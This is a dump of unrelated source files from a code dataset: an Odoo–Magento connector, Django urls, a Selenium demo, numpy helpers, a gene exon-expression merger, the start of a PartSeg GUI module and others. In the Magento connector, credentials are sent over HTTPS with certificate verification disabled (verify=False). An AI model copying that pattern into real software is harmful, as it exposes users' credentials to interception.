(\"1111\" in voice):\n chat_map_speak(\"安安你好我是1-1-1-1號對話,請你根據1-1-1-1號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_0)\n elif (\"1112\" in voice):\n chat_map_speak(\"安安你好我是1-1-1-2號對話,請你根據1-1-1-2號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_0)\n elif (\"1113\" in voice):\n chat_map_speak(\"安安你好我是1-1-1-3號對話,請你根據1-1-1-3號設定的每個情境環節說話看看,我就會回答窩\", 15, chat_map_response_0)\n else:\n chat_map_response_1_1(voice)\n\n\n\n\n\n\n\nchat_map_speak_init()\n\n\n\n","sub_path":"chat_project/chat/chat_test_ver1.py","file_name":"chat_test_ver1.py","file_ext":"py","file_size_in_byte":10963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356196736","text":"import friendly_traceback\nimport sys\n\n\ndef test_name_error():\n try:\n from . import raise_name_error # for pytest\n except ImportError:\n import raise_name_error\n\n try:\n raise_name_error.test()\n except Exception:\n friendly_traceback.explain(*sys.exc_info(), redirect=\"capture\")\n result = friendly_traceback.get_output()\n assert \"NameError: name 'c' is not defined\" in result\n return result\n\n\ndef test_flush():\n try:\n from . import raise_name_error # for pytest\n except ImportError:\n import raise_name_error\n\n try:\n raise_name_error.test()\n except Exception:\n friendly_traceback.explain(*sys.exc_info(), redirect=\"capture\")\n result = friendly_traceback.get_output(flush=False)\n assert \"NameError: name 'c' is not defined\" in result\n result = friendly_traceback.get_output() # flushes\n result = friendly_traceback.get_output() # returns empty list\n assert not result\n\n\nif __name__ == \"__main__\":\n result = test_name_error()\n print(result)\n","sub_path":"tests/catch_name_error.py","file_name":"catch_name_error.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12889592","text":"# -*- coding: utf-8 -*-\n##########################################################################\n#\n# Copyright (c) 2015-Present Webkul Software Pvt. Ltd. ()\n# See LICENSE file for full copyright and licensing details.\n# License URL : \n#\n##########################################################################\n\nimport json\nimport re\n\nimport requests\n\nfrom odoo import _, api, fields, models\nfrom odoo.addons.base.res.res_partner import _lang_get\nfrom odoo.exceptions import UserError\nfrom odoo.http import request\n\nXMLRPC_API = '/integration/admin/token'\n\n\nclass MagentoConfigure(models.Model):\n _name = \"magento.configure\"\n _inherit = ['mail.thread']\n _description = \"Magento Configuration\"\n _rec_name = 'instance_name'\n\n def _default_instance_name(self):\n return self.env[\n 'ir.sequence'].next_by_code('magento.configure')\n\n def _default_category(self):\n ctx = dict(self._context or {})\n categId = ctx.get('categ_id', False)\n if categId:\n return categId\n try:\n return self.env['ir.model.data'].get_object_reference(\n 'product', 'product_category_all')[1]\n except ValueError:\n return False\n\n def _fetch_magento_store(self, url, token):\n storeInfo = {}\n storeObj = self.env['magento.store.view']._get_store_view(url, token)\n storeInfo['store_id'] = storeObj\n return storeInfo\n\n name = fields.Char(\n string='Base URL',\n track_visibility=\"onchange\",\n required=True,\n )\n instance_name = fields.Char(\n string='Instance Name',\n default=lambda self: self._default_instance_name())\n user = fields.Char(\n string='User Name',\n track_visibility=\"onchange\",\n required=True)\n pwd = fields.Char(\n string='Password',\n track_visibility=\"onchange\",\n required=True,\n size=100)\n token = fields.Char(string='Token', size=100)\n status = fields.Char(string='Connection Status Message', readonly=True)\n active = fields.Boolean(\n string=\"Active\",\n track_visibility=\"onchange\",\n default=True)\n connection_status = fields.Boolean(\n string=\"Connection Status\", default=False)\n store_id = fields.Many2one(\n 'magento.store.view', string='Default Magento Store')\n group_id = fields.Many2one(\n related=\"store_id.group_id\",\n string=\"Default Store\",\n readonly=True,\n store=True)\n website_id = fields.Many2one(\n related=\"group_id.website_id\",\n string=\"Default Magento Website\",\n readonly=True)\n credential = fields.Boolean(\n string=\"Show/Hide Credentials Tab\",\n default=lambda *a: 1,\n help=\"If Enable, Credentials tab will be displayed, \"\n \"And after filling the details you can hide the Tab.\")\n notify = fields.Boolean(\n string='Notify Customer By Email',\n default=lambda *a: 1,\n help=\"If True, customer will be notify\"\n \"during order shipment and invoice, else it won't.\")\n language = fields.Selection(\n _lang_get, string=\"Default Language\", default=api.model(\n lambda self: self.env.lang), help=\"Selected language is loaded in the system, \"\n \"all documents related to this contact will be synched in this language.\")\n category = fields.Many2one(\n 'product.category',\n string=\"Default Category\",\n default=lambda self: self._default_category(),\n help=\"Selected Category will be set default category for odoo's product, \"\n \"in case when magento product doesn\\'t belongs to any catgeory.\")\n state = fields.Selection([\n ('enable','Enable'),\n ('disable','Disable')\n ],\n string='Status',\n default=\"enable\",\n help=\"status will be consider during order invoice, \"\n \"order delivery and order cancel, to stop asynchronous process at other end.\",\n size=100)\n inventory_sync = fields.Selection([\n ('enable','Enable'),\n ('disable','Disable')\n ],\n string='Inventory Update',\n default=\"enable\",\n help=\"If Enable, Invetory will Forcely Update During Product Update Operation.\",\n size=100)\n warehouse_id = fields.Many2one(\n 'stock.warehouse',\n string='Warehouse',\n default=lambda self: self.env['sale.order']._default_warehouse_id(),\n help=\"Used During Inventory Synchronization From Magento to Odoo.\")\n location_id = fields.Many2one(\n related='warehouse_id.lot_stock_id', string='Location')\n create_date = fields.Datetime(string='Created Date')\n correct_mapping = fields.Boolean(string='Correct Mapping', default=True)\n\n @api.model\n def create(self, vals):\n if 'name' in vals:\n frontEnd = vals.get('name', '').strip('/')\n vals['name'] = frontEnd\n activeConnections = self.search([('active', '=', True)])\n isMultiMobInstalled = False\n if self.env['ir.module.module'].sudo().search(\n [('name', 'in', ['odoo_magento_multi_instance', 'mob_hybrid_multi_instance'])], limit=1).state == 'installed':\n isMultiMobInstalled = True\n if vals.get('active') and activeConnections and not isMultiMobInstalled:\n raise UserError(\n _('Warning!\\nSorry, Only one active connection is allowed.'))\n if not vals.get('instance_name', False):\n vals['instance_name'] = self.env[\n 'ir.sequence'].next_by_code('magento.configure')\n res = super(MagentoConfigure, self).create(vals)\n self.env['mob.dashboard']._create_dashboard(res)\n return res\n\n @api.multi\n def write(self, vals):\n if 'name' in vals:\n frontEnd = vals.get('name', '').strip('/')\n vals['name'] = frontEnd\n activeConnections = self.search([('active', '=', True)])\n isMultiMobInstalled = False\n dashboardModel = self.env['mob.dashboard']\n if self.env['ir.module.module'].sudo().search(\n [('name', 'in', ['odoo_magento_multi_instance', 'mob_hybrid_multi_instance'])], limit=1).state == 'installed':\n isMultiMobInstalled = True\n if vals:\n if len(activeConnections) > 0 and vals.get(\n 'active') and not isMultiMobInstalled:\n raise UserError(\n _('Warning!\\nSorry, Only one active connection is allowed.'))\n for instanceObj in self:\n if (vals.get('name') and vals['name'] != instanceObj.name) or \\\n (vals.get('user') and vals['user'] != instanceObj.user) or \\\n (vals.get('pwd') and vals['pwd'] != instanceObj.pwd):\n token = instanceObj.create_magento_connection(vals)\n if token:\n if len(token[0]) > 1:\n if token[0][0]:\n vals['token'] = str(token[0][0])\n vals[\n 'status'] = \"Congratulation, It's Successfully Connected with Magento Api.\"\n vals['connection_status'] = True\n else:\n vals['token'] = False\n vals['status'] = str(token[0][1])\n vals['connection_status'] = False\n if not instanceObj.instance_name:\n vals['instance_name'] = self.env[\n 'ir.sequence'].next_by_code('magento.configure')\n isDashboardExist = dashboardModel.with_context(\n active_test=False).search([('instance_id', '=', self.id)])\n if not isDashboardExist:\n dashboardModel._create_dashboard(instanceObj)\n return super(MagentoConfigure, self).write(vals)\n\n @api.multi\n def set_default_magento_website(self, url, token):\n for obj in self:\n storeId = obj.store_id\n ctx = dict(self._context or {})\n ctx['instance_id'] = obj.id\n if not storeId:\n storeInfo = self.with_context(\n ctx)._fetch_magento_store(url, token)\n if not storeInfo:\n raise UserError(\n _('Error!\\nMagento Default Website Not Found!!!'))\n return True\n\n #############################################\n ## magento connection ##\n #############################################\n @api.multi\n def test_connection(self):\n token = 0\n connectionStatus = False\n status = 'Magento Connection Un-successful'\n text = 'Test connection Un-successful please check the magento login credentials !!!'\n checkMapping = self.correct_mapping\n token = self.create_magento_connection()\n if token:\n if len(token[0]) > 1:\n if token[0][0]:\n self.token = str(token[0][0])\n storeId = self.set_default_magento_website(\n self.name, self.token)\n text = str(token[0][1])\n status = \"Congratulation, It's Successfully Connected with Magento.\"\n connectionStatus = True\n else:\n status = str(token[0][1])\n self.status = status\n res_model = 'message.wizard'\n partial = self.env['message.wizard'].create({'text': text})\n view_id = self.env.ref('odoo_magento_connect.message_wizard_form1').id\n if not self.store_id and connectionStatus:\n partial = self.env['magento.wizard'].create(\n {'magento_store_view': self.store_id.id})\n view_id = self.env.ref(\n 'odoo_magento_connect.id_magento_wizard_form').id\n res_model = 'magento.wizard'\n if checkMapping:\n self.correct_instance_mapping()\n ctx = dict(self._context or {})\n ctx['text'] = text\n ctx['instance_id'] = self.id\n self.connection_status = connectionStatus\n return {'name': (\"Odoo Magento Bridge\"),\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_model': res_model,\n 'view_id': view_id,\n 'res_id': partial.id,\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'context': ctx,\n 'target': 'new',\n }\n\n @api.model\n def _create_connection(self):\n \"\"\" create a connection between Odoo and magento \n returns: False or list\"\"\"\n instanceId = self._context.get('instance_id', False)\n token = ''\n if instanceId:\n instanceObj = self.browse(instanceId)\n else:\n activeConnections = self.search([('active', '=', True)])\n if len(activeConnections) > 1:\n raise UserError(\n _('Error!\\nSorry, only one Active Configuration setting is allowed.'))\n if not activeConnections:\n raise UserError(\n _('Error!\\nPlease create the configuration part for Magento connection!!!'))\n else:\n instanceObj = activeConnections[0]\n token_generation = instanceObj.create_magento_connection()\n if token_generation:\n if len(token_generation[0]) > 1:\n if token_generation[0][0]:\n instanceObj.token = token_generation[0][0]\n token = token_generation[0][0]\n if token:\n return [instanceObj.name, token, instanceObj.id]\n else:\n return False\n\n @api.one\n def create_magento_connection(self, vals={}):\n text, token = '', ''\n url = self.name + \"/index.php/rest/V1\" + XMLRPC_API\n user = self.user\n pwd = self.pwd\n if vals:\n if vals.get('name'):\n url = vals['name'] + \"/index.php/rest/V1\" + XMLRPC_API\n if vals.get('user'):\n user = vals['user']\n if vals.get('pwd'):\n pwd = vals['pwd']\n Cre = {\n \"username\": user,\n \"password\": pwd\n }\n Cred = json.dumps(Cre)\n headers = {'Content-Type': 'application/json'}\n try:\n userAgent = request.httprequest.environ.get('HTTP_USER_AGENT', '')\n headers.update({'User-Agent': userAgent})\n except Exception as e:\n pass\n try:\n responseApi = requests.post(url, data=Cred, headers=headers, verify=False)\n response = json.loads(responseApi.text)\n if responseApi.ok :\n token = \"Bearer \" + response\n text = 'Test Connection with magento is successful, now you can proceed with synchronization.'\n else :\n text = ('Magento Connection Error: %s') % response.get('message')\n except Exception as e:\n text = ('Error!\\nMagento Connection Error: %s') % e\n return [token, text]\n\n @api.model\n def fetch_connection_info(self, vals):\n \"\"\"\n Called by Xmlrpc from Magento\n \"\"\"\n if vals.get('magento_url'):\n activeConnections = self.search([('active', '=', True)])\n isMultiMobInstalled = self.env['ir.module.module'].sudo().search(\n [('name', 'in', ['odoo_magento_multi_instance', 'mob_hybrid_multi_instance']), (\"state\", \"=\", \"installed\")])\n if isMultiMobInstalled:\n magentoUrl = re.sub(r'^https?:\\/\\/', '', vals.get('magento_url'))\n magentoUrl = re.split('index.php', magentoUrl)[0]\n for connectionObj in activeConnections:\n act = connectionObj.name\n act = re.sub(r'^https?:\\/\\/', '', act)\n if magentoUrl == act or magentoUrl[:-1] == act:\n return connectionObj.read(\n ['language', 'category', 'warehouse_id'])[0]\n else:\n for connectionObj in activeConnections:\n return connectionObj.read(\n ['language', 'category', 'warehouse_id'])[0]\n return False\n\n @api.model\n def correct_instance_mapping(self):\n self.mapped_status(\"magento.product\")\n self.mapped_status(\"magento.product.template\")\n self.mapped_status(\"wk.order.mapping\")\n self.mapped_status(\"magento.customers\")\n self.mapped_status(\"magento.product.attribute.value\")\n self.mapped_status(\"magento.product.attribute\")\n self.mapped_status(\"magento.category\")\n self.mapped_status(\"magento.website\")\n self.mapped_status(\"magento.store\")\n self.mapped_status(\"magento.store.view\")\n self.mapped_status(\"magento.attribute.set\")\n return True\n\n @api.model\n def mapped_status(self, model):\n falseInstances = self.env[model].search([('instance_id', '=', False)])\n if falseInstances:\n falseInstances.write({'instance_id': self.id})\n return True\n \n @api.model\n def mob_upgrade_hook(self):\n activeConfigs = self.sudo().search([('active', '=', True)])\n for activeConfig in activeConfigs :\n activeConfig.sudo().test_connection()\n\n @api.model\n def _mob_def_setting(self):\n configModel = self.env['res.config.settings']\n vals = {\n 'mob_sale_order_invoice' : True,\n 'mob_sale_order_shipment' : True,\n 'mob_sale_order_cancel' : True,\n }\n defaultSetObj = configModel.create(vals)\n defaultSetObj.execute()\n return True\n","sub_path":"odoo_magento_connect/models/magento_configure.py","file_name":"magento_configure.py","file_ext":"py","file_size_in_byte":15857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632840814","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, unicode_literals\n\n\n#\n# RPS\n#\nfrom rps.rpsretrato import *\nfrom StringIO import StringIO\n\nclass _Prestador(object):\n pass\n\nclass RPS(object):\n def __init__(self):\n self.caminho = ''\n self.salvar_arquivo = True\n\n self.dados_rps = None\n self.rps = None\n\n self.obs_impressao = 'DANFE gerado em %(now:%d/%m/%Y, %H:%M:%S)s'\n self.nome_sistema = ''\n self.site = ''\n self.logo = ''\n self.leiaute_logo_vertical = False\n \n self.prestador = _Prestador()\n self.prestador.nome = ''\n self.prestador.cnpj = ''\n self.prestador.im = ''\n self.prestador.endereco = ''\n self.prestador.cidade = ''\n self.prestador.estado = ''\n \n self.dados_prestador = []\n\n def gerar_rps(self):\n if self.dados_rps is None:\n raise ValueError('Não é possível gerar um RPS sem a informação do arquivo xml')\n\n #\n # Prepara o queryset para impressão\n #\n #self.NFe.monta_chave()\n #self.NFe.monta_dados_contingencia_fsda()\n self.dados_rps.site = self.site\n self.dados_rps.prestador = self.prestador\n \n if self.prestador.nome == '':\n self.prestador.nome = self.dados_rps.RazaoSocialPrestador.valor\n \n if self.prestador.im == '':\n self.prestador.im = self.dados_rps.InscricaoMunicipalPrestador.valor\n \n for item in self.dados_rps.Itens:\n item.RPS = self.dados_rps\n\n #\n # Prepara as bandas de impressão para cada formato\n #\n self.rps = RPSRetrato()\n self.rps.queryset = self.dados_rps.Itens\n \n self.rps.band_page_header = self.rps.cabecalho\n self.rps.band_page_header.child_bands = []\n self.rps.band_page_header.child_bands.append(self.rps.prestador)\n self.rps.band_page_header.child_bands.append(self.rps.tomador)\n self.rps.band_page_header.child_bands.append(self.rps.discriminacao)\n \n self.rps.band_page_footer = self.rps.rodape\n \n self.rps.band_detail = self.rps.detalhe_item\n\n #\n # Observação de impressão\n #\n if self.nome_sistema:\n self.rps.ObsImpressao.expression = self.nome_sistema + u' - ' + self.obs_impressao\n else:\n self.rps.ObsImpressao.expression = self.obs_impressao\n\n ##\n ## Quadro do emitente\n ##\n ## Personalizado?\n #if self.dados_prestador:\n #self.rps.prestador.monta_quadro_prestador(self.dados_prestador)\n #else:\n ## Sem logotipo\n #if not self.logo:\n #self.danfe.remetente.monta_quadro_emitente(self.danfe.remetente.dados_emitente_sem_logo())\n\n ## Logotipo na vertical\n #elif self.leiaute_logo_vertical:\n #self.danfe.remetente.monta_quadro_emitente(self.danfe.remetente.dados_emitente_logo_vertical(self.logo))\n\n ## Logotipo na horizontal\n #else:\n #self.danfe.remetente.monta_quadro_emitente(self.danfe.remetente.dados_emitente_logo_horizontal(self.logo))\n\n if self.salvar_arquivo:\n #nome_arq = self.caminho + self.NFe.chave + '.pdf'\n nome_arq = 'rps_teste.pdf'\n self.rps.generate_by(PDFGenerator, filename=nome_arq)\n\n","sub_path":"pysped/nfse/processador_nfse.py","file_name":"processador_nfse.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384806597","text":"import numpy as np\nfrom math import sqrt,floor\n\ndef init_input_matrices(size1,size2,low=0,up=1):\n A = (np.random.rand(size1[0],size1[1])*(up-low)) + low;\n B = (np.random.rand(size2[0],size2[1])*(up-low)) + low;\n return A,B\n\ndef get_procs(C_size,num):\n ar = C_size[0]/C_size[1];\n min_ratio = 100000; # arbitrary large number\n facts = num;\n flag = 0;\n if (ar>1):\n ar = 1/ar;\n flag = 1;\n for i in range(2,int(sqrt(num))+1):\n if (num%i == 0):\n ar1 = (pow(i,2))/(num);\n if abs((ar/ar1)-1) < min_ratio:\n min_ratio = abs((ar/ar1)-1);\n facts = i;\n if flag == 1:\n return (num/facts),facts\n else:\n return facts,(num/facts)\n","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"450966400","text":"\"\"\"\n Create a Module \"api\" and create an empty file __init__.py in the persons app\n [simple create a folder named \"api\" and create \"__init__.py\" file containes nothing. It will help to detect this folder\n as a module by the system]\n Then create urls.py file here\n This is done because it's better to separate api's view logic from normal views as well as url patterns\n\"\"\"\nfrom django.conf.urls import url\nfrom django.urls import path,re_path\nfrom .views import (\n SingleApiView,\n ListAPIView\n)\n\nurlpatterns = [\n path('', ListAPIView.as_view()),\n re_path('(?P\\d+)/',SingleApiView.as_view()),\n]","sub_path":"persons/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220768014","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom time import sleep\n\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.maximize_window()\ndriver.get('http://sahitest.com/demo/dragDropMooTools.htm')\n\n\ndragger = driver.find_element_by_id('dragger') # 被拖拽元素\nitem1 = driver.find_element_by_xpath('//div[text()=\"Item 1\"]') # 目标元素1\nitem2 = driver.find_element_by_xpath('//div[text()=\"Item 2\"]') # 目标2\nitem3 = driver.find_element_by_xpath('//div[text()=\"Item 3\"]') # 目标3\nitem4 = driver.find_element_by_xpath('//div[text()=\"Item 4\"]') # 目标4\n\n\n'''\ndrag_and_drop(源,目标):在源元素上按住鼠标左键,然后移动到目标元素并释放鼠标按钮。\nARGS:\t\n来源:鼠标向下的元素。 目标:要向上移动的元素。\n'''\n# ActionChains(driver).drag_and_drop(dragger,item1).perform() # 1.移动dragger到目标1\n# ActionChains(driver).click_and_hold(dragger).release(item2).perform() # 2.效果与上句相同,也能起到移动效果\n# ActionChains(driver).click_and_hold(dragger).move_to_element(item3).release().perform() # 3.效果与上两句相同,也能起到移动的效果\n\n\n'''\ndrag_and_drop_by_offset(source,xoffset,yoffset ):\n在源元素上按住鼠标左键,\n然后移动到目标偏移量并释放鼠标按钮\nARGS:\t\n来源:鼠标向下的元素。\nxoffset:移动到的X偏移量。\nyoffset:Y移动到的偏移量。\n\n'''\n# ActionChains(driver).drag_and_drop_by_offset(dragger,400,150).perform() # 4.移动到指定坐标\n\n\n\n'''\nclick_and_hold(on_element = None )\n按住鼠标左键在一个元素上。\nARGS:\ton_element:鼠标向下的元素。如果无,则单击当前鼠标位置。\n\nmove_by_offset(xoffset,yoffset ):\n将鼠标移至当前鼠标位置的偏移量\nARGS:\t\nxoffset:移动到的X偏移量,作为正整数或负整数。\nyoffset:作为正整数或负整数移动到Y的偏移量。\n'''\nActionChains(driver).click_and_hold(dragger).move_by_offset(400,150).release().perform() # 5.与上一句相同,移动到指定坐标\n\n\n\n","sub_path":"0513练习/selenium_demo11(其他动作之拖拽).py","file_name":"selenium_demo11(其他动作之拖拽).py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539746434","text":"def howManyWays(amount, maxCoin):\n if amount == 0:\n return 1\n else:\n return sum(\n map(\n lambda chosenCoin: howManyWays(amount - chosenCoin, chosenCoin),\n list(\n filter(\n lambda coin: coin <= min(maxCoin, amount), [1, 2, 5, 10, 20, 50 ,100, 200]\n )\n )\n )\n )\n\nprint(howManyWays(10, 200))\n","sub_path":"p031/p031.py","file_name":"p031.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419621510","text":"import os\nimport json\n\nfrom sickkidsproj import app, db\nfrom sickkidsproj.database.query import get_exonexpr_storepath\nfrom sickkidsproj.cache.g import ONE_EXPRDATA, GENCODEID_STRAND_REF, ENSEMBLID_EXONCOUNT_REF, EXPRDATA_FILEPATHS, EXT_INC\nfrom sickkidsproj.utils.check import isEnsemblId\n\n\ndef extract_gencodeid(gencodeid):\n \"\"\" splits gencode exonid to ensembl_id and exon_num based on strand +/-\n + --> exon_num += 1\n - --> exon_num = exon_count - exon_num\n\n @param gencodeid str: ENSG00000000003.10_0\n @rType (ensembl_id, exon_num) \n \"\"\"\n\n if gencodeid not in GENCODEID_STRAND_REF:\n raise Exception(\"invalid gencodeid {} or empty GENECODEID_STRAND_REF\".format(gencodeid))\n\n strand = GENCODEID_STRAND_REF[gencodeid]\n assert (strand == \"+\" or strand == \"-\"), \"invalid strand {} or empty GENCODEID_STRAND_REF\".format(strand)\n\n exon_num = int(gencodeid.strip().split('_')[-1])\n ensembl_id = gencodeid.strip().split('.')[0]\n exon_count = ENSEMBLID_EXONCOUNT_REF[ensembl_id]\n\n if(strand == \"+\"):\n exon_num += 1\n else:\n exon_num = exon_count - exon_num\n \n return (ensembl_id, str(exon_num))\n\n\n\ndef add_to_exonexpr(exon_expr, filename = ONE_EXPRDATA):\n \"\"\" Incorporates exon expr experimental data under /data/experiment \n to resources/exon_expr\n \n Precondition: rows sorted by ensemblid, exons of same gene are local\n\n @param filename str\n @param exon_expr {\n ensembl_id: {\n exon_num:{\n tissueSite: [ ..., read ]\n }, ...\n }, ...\n }\n \"\"\"\n\n tissueSite = filename.strip().split('-')[-1]\n \n with open(filename, 'r') as inf:\n\n inf.readline()\n iterations = 0\n\n for line in inf:\n\n row = line.strip().split('\\t')\n assert(len(row) == 5)\n\n exonid = row[3]\n read = float(row[4])\n ensembl_id, exon_num = extract_gencodeid(exonid)\n\n assert (read >= 0 and isinstance(read, float)), \"invalid read {}\".format(read)\n assert (isinstance(exon_num, str)), \"invalid exon_num {}\".format(exon_num)\n if not isEnsemblId(ensembl_id):\n continue\n\n if ensembl_id not in exon_expr:\n exon_expr[ensembl_id] = {}\n if exon_num not in exon_expr[ensembl_id]:\n exon_expr[ensembl_id][exon_num] = {}\n if tissueSite not in exon_expr[ensembl_id][exon_num]:\n exon_expr[ensembl_id][exon_num][tissueSite] = []\n\n exon_expr[ensembl_id][exon_num][tissueSite].append(read)\n\n # iterations -= 1\n # if iterations < 0:\n # break\n\n\ndef merge_exonexpr(src_exonexpr, new_exonexpr):\n \"\"\" Merges new_exonexpr into src_exonexpr\n -- new_exonexpr..tissueSite \n ---- no tissueSite key in src_exonexpr.\n ------ tissueSite: [ ..., reads ] added to src_exonexpr\n ---- appends new reads into src exon_expr tissueSite list\n\n @precondition\n -- new_exonexpr. cannot invent new exon_num compared to src_exonexpr.exon_num\n \n @param src_exonexpr dict\n @param new_exonexpr dict\n \n Both src_exonexpr, and new_exonexpr\n {\n exon_num: {\n tissueSite: [ ..., reads ]\n }, ...\n }\n \"\"\"\n\n src_exon_nums = list(src_exonexpr.keys()) \n\n # print(\"before\", src_exonexpr)\n for exon_num, tissueSiteReads in new_exonexpr.items():\n if exon_num not in src_exon_nums:\n raise Exception(\"Experimental data generated exon number {} not present in GTex exon_expr\".format(exon_num))\n # src_exonexpr[exon_num] is valid here\n\n for tissueSite, reads in new_exonexpr[exon_num].items():\n if tissueSite not in src_exonexpr[exon_num]:\n src_exonexpr[exon_num][tissueSite] = []\n src_exonexpr[exon_num][tissueSite].extend(reads)\n # print(\"after\", src_exonexpr)\n\n\n\n\ndef inc_data(datafiles = EXPRDATA_FILEPATHS):\n \"\"\" Incoporates exon expression located in datafiles\n into resources/exon_expr\n -- combine and format read data to exon_expr\n -- Iterates exon_expr and for each gene\n ---- queries database to locate the files storing reads under resources/exon_expr\n ---- Merge exon_expr for this gene to the corresponding file, appends `.inc` extension\n \"\"\"\n\n exon_expr = {}\n for filename in datafiles:\n add_to_exonexpr(exon_expr, filename)\n\n files_modified = []\n for ensembl_id, exon_expr_per_gene in exon_expr.items():\n src_fp = get_exonexpr_storepath(ensembl_id)\n dst_fp = src_fp + \".\" + EXT_INC\n\n # Since only a small subset in mapping is in resources/exon_expr, \n # we skip over files and continues merging only if file exists\n if os.path.exists(src_fp):\n with open(src_fp, 'r') as inf:\n with open(dst_fp, \"w+\") as outf:\n\n merged_exon_expr = json.loads(inf.read())\n merge_exonexpr(merged_exon_expr, exon_expr_per_gene)\n outf.write(json.dumps(merged_exon_expr))\n\n print(\"Merged to {}\".format(src_fp))\n files_modified.append(src_fp)\n print(files_modified)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sickkidsproj/analysis/inc_data.py","file_name":"inc_data.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"206445043","text":"import json\nimport logging\nimport os\nimport typing\nfrom contextlib import contextmanager\nfrom copy import copy, deepcopy\nfrom enum import Enum\n\nfrom qtpy.QtCore import Qt, Signal\nfrom qtpy.QtWidgets import (\n QAction,\n QCheckBox,\n QComboBox,\n QCompleter,\n QDialog,\n QFileDialog,\n QGridLayout,\n QGroupBox,\n QInputDialog,\n QLabel,\n QLineEdit,\n QListWidget,\n QListWidgetItem,\n QMenu,\n QMessageBox,\n QPushButton,\n QSplitter,\n QTabWidget,\n QTextEdit,\n QTreeWidget,\n QTreeWidgetItem,\n QVBoxLayout,\n QWidget,\n)\nfrom superqt import QEnumComboBox\n\nfrom PartSeg._roi_analysis.partseg_settings import PartSettings\nfrom PartSeg._roi_analysis.profile_export import ExportDialog, ImportDialog\nfrom PartSeg.common_backend.except_hook import show_warning\nfrom PartSeg.common_gui.custom_load_dialog import PLoadDialog\nfrom PartSeg.common_gui.custom_save_dialog import FormDialog, PSaveDialog\nfrom PartSeg.common_gui.mask_widget import MaskWidget\nfrom PartSeg.common_gui.searchable_list_widget import SearchableListWidget\nfrom PartSeg.common_gui.universal_gui_part import right_label\nfrom PartSegCore.algorithm_describe_base import AlgorithmProperty, ROIExtractionProfile\nfrom PartSegCore.analysis import SegmentationPipeline\nfrom PartSegCore.analysis.algorithm_description import AnalysisAlgorithmSelection\nfrom PartSegCore.analysis.calculation_plan import (\n CalculationPlan,\n MaskBase,\n MaskCreate,\n MaskFile,\n MaskIntersection,\n MaskSub,\n MaskSuffix,\n MaskSum,\n MeasurementCalculate,\n NodeType,\n PlanChanges,\n RootType,\n Save,\n)\nfrom PartSegCore.analysis.measurement_calculation import MeasurementProfile\nfrom PartSegCore.analysis.save_functions import save_dict\nfrom PartSegCore.io_utils import LoadPlanExcel, LoadPlanJson, SaveBase\nfrom PartSegCore.universal_const import Units\n\ngroup_sheet = (\n \"QGroupBox {border: 1px solid gray; border-radius: 9px; margin-top: 0.5em;} \"\n \"QGroupBox::title {subcontrol-origin: margin; left: 10px; padding: 0 3px 0 3px;}\"\n)\n\nMAX_CHANNEL_NUM = 10\n\n\nclass MaskDialog(QDialog):\n def __init__(self, mask_names):\n super().__init__()\n self.mask_names = mask_names\n completer = QCompleter(list(mask_names))\n completer.setCaseSensitivity(Qt.CaseInsensitive)\n self.setWindowTitle(\"Masks name choose\")\n self.mask1_name = QLineEdit()\n self.cancel_btn = QPushButton(\"Cancel\")\n self.ok_btn = QPushButton(\"Ok\")\n\n self.mask1_name.setCompleter(completer)\n self.mask1_name.textChanged.connect(self.text_changed)\n self.cancel_btn.clicked.connect(self.close)\n self.ok_btn.clicked.connect(self.accept)\n self.ok_btn.setDisabled(True)\n\n layout = QGridLayout()\n layout.addWidget(right_label(\"Mask 1 name:\"), 0, 0)\n layout.addWidget(self.mask1_name, 0, 1)\n layout.addWidget(self.cancel_btn, 2, 0)\n layout.addWidget(self.ok_btn, 2, 1)\n self.setLayout(layout)\n\n def text_changed(self):\n text1 = self.get_result()[0]\n if not text1 or text1 not in self.mask_names:\n self.ok_btn.setDisabled(True)\n else:\n self.ok_btn.setDisabled(False)\n\n def get_result(self):\n text1 = str(self.mask1_name.text()).strip()\n return (text1,)\n\n\nclass TwoMaskDialog(QDialog):\n def __init__(self, mask_names: typing.Iterable[str]):\n \"\"\"\n :param mask_names: iterable collection of all available mask names\n \"\"\"\n super().__init__()\n self.mask_names = mask_names\n completer = QCompleter(list(mask_names))\n completer.setCaseSensitivity(Qt.CaseInsensitive)\n self.setWindowTitle(\"Masks name choose\")\n self.mask1_name = QLineEdit()\n self.mask2_name = QLineEdit()\n self.cancel_btn = QPushButton(\"Cancel\")\n self.ok_btn = QPushButton(\"Ok\")\n\n self.mask1_name.setCompleter(completer)\n self.mask1_name.textChanged.connect(self.text_changed)\n self.mask2_name.setCompleter(completer)\n self.mask2_name.textChanged.connect(self.text_changed)\n self.cancel_btn.clicked.connect(self.close)\n self.ok_btn.clicked.connect(self.accept)\n self.ok_btn.setDisabled(True)\n\n layout = QGridLayout()\n layout.addWidget(right_label(\"Mask 1 name:\"), 0, 0)\n layout.addWidget(self.mask1_name, 0, 1)\n layout.addWidget(right_label(\"Mask 2 name:\"), 1, 0)\n 